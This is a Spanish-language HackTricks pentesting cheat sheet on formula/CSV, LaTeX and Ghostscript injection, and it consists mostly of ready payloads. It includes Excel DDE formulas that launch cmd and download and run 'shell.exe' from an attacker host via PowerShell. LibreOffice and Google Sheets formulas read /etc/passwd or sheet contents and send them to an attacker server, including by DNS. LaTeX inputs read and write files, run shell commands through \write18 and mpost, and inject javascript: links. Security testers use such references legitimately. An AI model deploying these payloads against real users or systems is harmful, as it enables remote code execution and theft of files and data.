hacktricks/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md

13 KiB

Inyección de Fórmulas/CSV/Doc/LaTeX/GhostScript

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Encuentra vulnerabilidades que importan más para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, ejecuta escaneos proactivos de amenazas, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. Pruébalo gratis hoy.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


Inyección de Fórmulas

Información

Si tu entrada se está reflejando dentro de archivos CSV (o cualquier otro archivo que probablemente se abrirá en Excel), es posible que puedas insertar fórmulas de Excel que se ejecutarán cuando el usuario abra el archivo o cuando el usuario haga clic en algún enlace dentro de la hoja de cálculo de Excel.

{% hint style="danger" %} Hoy en día, Excel alertará (varias veces) al usuario cuando algo se carga desde fuera de Excel para evitar que realice acciones maliciosas. Por lo tanto, se debe aplicar un esfuerzo especial en Ingeniería Social para la carga final. {% endhint %}

Lista de palabras

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Hipervínculo

El siguiente ejemplo es muy útil para exfiltrar contenido de la hoja de cálculo final y realizar solicitudes a ubicaciones arbitrarias. Pero requiere que el usuario haga clic en el enlace (y acepte las advertencias).

El siguiente ejemplo fue tomado de https://payatu.com/csv-injection-basic-to-exploit

Imagina una brecha de seguridad en un sistema de Gestión de Registros de Estudiantes que es explotada a través de un ataque de inyección de CSV. La intención principal del atacante es comprometer el sistema utilizado por los profesores para gestionar los detalles de los estudiantes. El método implica que el atacante inyecte una carga maliciosa en la aplicación, específicamente ingresando fórmulas dañinas en campos destinados para los detalles de los estudiantes. El ataque se desarrolla de la siguiente manera:

  1. Inyección de Carga Maliciosa:
  • El atacante envía un formulario de detalles de estudiante pero incluye una fórmula comúnmente utilizada en hojas de cálculo (por ejemplo, =HYPERLINK("<enlace_malicioso>","Haz clic aquí")).
  • Esta fórmula está diseñada para crear un hipervínculo, pero apunta a un servidor malicioso controlado por el atacante.
  1. Exportación de Datos Comprometidos:
  • Los profesores, sin ser conscientes del compromiso, utilizan la funcionalidad de la aplicación para exportar los datos a un archivo CSV.
  • Cuando se abre el archivo CSV, todavía contiene la carga maliciosa. Esta carga aparece como un hipervínculo clickeable en la hoja de cálculo.
  1. Desencadenando el Ataque:
  • Un profesor hace clic en el hipervínculo, creyendo que es una parte legítima de los detalles del estudiante.
  • Al hacer clic, los datos sensibles (potencialmente incluyendo detalles de la hoja de cálculo o de la computadora del profesor) son transmitidos al servidor del atacante.
  1. Registrando los Datos:
  • El servidor del atacante recibe y registra los datos sensibles enviados desde la computadora del profesor.
  • El atacante puede entonces utilizar estos datos para varios propósitos maliciosos, comprometiendo aún más la privacidad y seguridad de los estudiantes y la institución.

RCE

Consulta el post original para más detalles.

En configuraciones específicas o versiones antiguas de Excel, una característica llamada Intercambio Dinámico de Datos (DDE) puede ser explotada para ejecutar comandos arbitrarios. Para aprovechar esto, los siguientes ajustes deben estar habilitados:

  • Navega a Archivo → Opciones → Centro de Confianza → Configuración del Centro de Confianza → Contenido Externo, y habilita Lanzamiento del Servidor de Intercambio Dinámico de Datos.

Cuando se abre una hoja de cálculo con la carga maliciosa (y si el usuario acepta las advertencias), la carga se ejecuta. Por ejemplo, para abrir la aplicación de calculadora, la carga sería:

`=cmd|' /C calc'!xxx`

Se pueden ejecutar también comandos adicionales, como descargar y ejecutar un archivo usando PowerShell:

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Inclusión Local de Archivos (LFI) en LibreOffice Calc

LibreOffice Calc se puede utilizar para leer archivos locales y exfiltrar datos. Aquí hay algunos métodos:

  • Leyendo la primera línea del archivo local /etc/passwd: ='file:///etc/passwd'#$passwd.A1
  • Exfiltrando los datos leídos a un servidor controlado por el atacante: =WEBSERVICE(CONCATENATE("http://<IP del atacante>:8080/",('file:///etc/passwd'#$passwd.A1)))
  • Exfiltrando más de una línea: =WEBSERVICE(CONCATENATE("http://<IP del atacante>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
  • Exfiltración DNS (enviando datos leídos como consultas DNS a un servidor DNS controlado por el atacante): =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<dominio del atacante>"))

Google Sheets para Exfiltración de Datos Out-of-Band (OOB)

Google Sheets ofrece funciones que pueden ser explotadas para la exfiltración de datos OOB:

  • CONCATENATE: Une cadenas juntas - =CONCATENATE(A2:E2)
  • IMPORTXML: Importa datos de tipos de datos estructurados - =IMPORTXML(CONCAT("http://<IP del atacante:Puerto>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
  • IMPORTFEED: Importa fuentes RSS o ATOM - =IMPORTFEED(CONCAT("http://<IP del atacante:Puerto>//123.txt?v=", CONCATENATE(A2:E2)))
  • IMPORTHTML: Importa datos de tablas HTML o listas - =IMPORTHTML (CONCAT("http://<IP del atacante:Puerto>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
  • IMPORTRANGE: Importa un rango de celdas de otra hoja de cálculo - =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[ID_de_Hoja]", "hoja1!A2:E2")
  • IMAGE: Inserta una imagen en una celda - =IMAGE("https://<IP del atacante:Puerto>/images/srpr/logo3w.png")

Inyección de LaTeX

Por lo general, los servidores que se encuentran en internet y que convierten código LaTeX a PDF utilizan pdflatex.
Este programa utiliza 3 atributos principales para (des)habilitar la ejecución de comandos:

  • --no-shell-escape: Deshabilita la construcción \write18{comando}, incluso si está habilitada en el archivo texmf.cnf.
  • --shell-restricted: Igual que --shell-escape, pero limitado a un conjunto 'seguro' de comandos predefinidos (**En Ubuntu 16.04 la lista está en /usr/share/texmf/web2c/texmf.cnf).
  • --shell-escape: Habilita la construcción \write18{comando}. El comando puede ser cualquier comando de shell. Esta construcción normalmente está deshabilitada por razones de seguridad.

Sin embargo, existen otras formas de ejecutar comandos, por lo que para evitar RCE es muy importante usar --shell-restricted.

Leer archivo

Es posible que necesites ajustar la inyección con envolturas como [ o $.

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Leer archivo de una sola línea

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Leer archivo con múltiples líneas

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

Escribir archivo

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Ejecución de comandos

La entrada del comando se redirigirá a stdin, utilice un archivo temporal para obtenerla.

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Si obtienes algún error de LaTex, considera usar base64 para obtener el resultado sin caracteres no deseados.

\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}

Cross Site Scripting

De @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Inyección de Ghostscript

Ver https://blog.redteam-pentesting.de/2023/ghostscript-overview/

Referencias

Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, ejecuta escaneos proactivos de amenazas, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. ¡Pruébalo gratis hoy.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: